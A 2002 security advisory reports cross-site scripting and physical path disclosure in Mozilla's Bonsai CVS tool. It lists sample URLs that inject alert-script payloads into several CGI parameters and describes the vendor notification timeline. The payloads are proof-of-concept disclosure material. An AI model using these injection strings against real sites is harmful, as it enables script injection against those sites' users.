Author: Stan Bubrouski Date: 19 August 2002 Product: Bonsai Versions Affected: All(Current and CVS all vulnerable) Severity: Cross Site Scripting is possible in several places due to a lack of stripping of tags from input. Some error messages also contain CSS and reveal the physical path of the Bonsai scripts. Problem: We all know how CSS works, so I'll just include some sample URLs to demonstrate the problem. CSS Problems: /webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert(document.domain)</script> /webtools/bonsai/cvslog.cgi?file=<script>alert(document.domain)</script> /webtools/bonsai/cvsblame.cgi?file=/index.html&root=<script>alert(document.domain)</script> /webtools/bonsai/cvsblame.cgi?file=<script>alert(document.domain)</script> /cvsquery.cgi?branch=<script>alert(document.domain)</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> /cvsquery.cgi?module=<script>alert(document.domain)</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week /showcheckins.cgi?person=<script>alert(document.domain)</script> /cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert(document.domain)</script>&branch=HEAD Physical Path Revealing and CSS: /bonsai/cvslog.cgi?file=/index.html&rev=<script>alert(document.domain)</script>&root=/cvsroot/ Physical Path Revealing only: /bonsai/cvsview2.cgi /bonsai/multidiff.cgi As you can see there are many ways to display the problems although many are related to error output subroutines and just some subroutines in general which do not properly filter input. Something to keep in mind if anyone out there is using Bonsai. The physical paths are revealed in some instances because of perl error messages (it appears) being thrown directly onto the webpage thus revealing physical paths. Vendor Notification: Notification of the vulnerability was sent to the Mozilla team on August 5, 2002. After recieving no response on the matter, I sent another another message on August 7th and I recieved a brief response from someone the same day. The problem still exists on mozilla.org and no changes have been made to Bonsai CVS to this very day. The fix seems simple, but I do not have a system to test with so I cannot offer any solution.
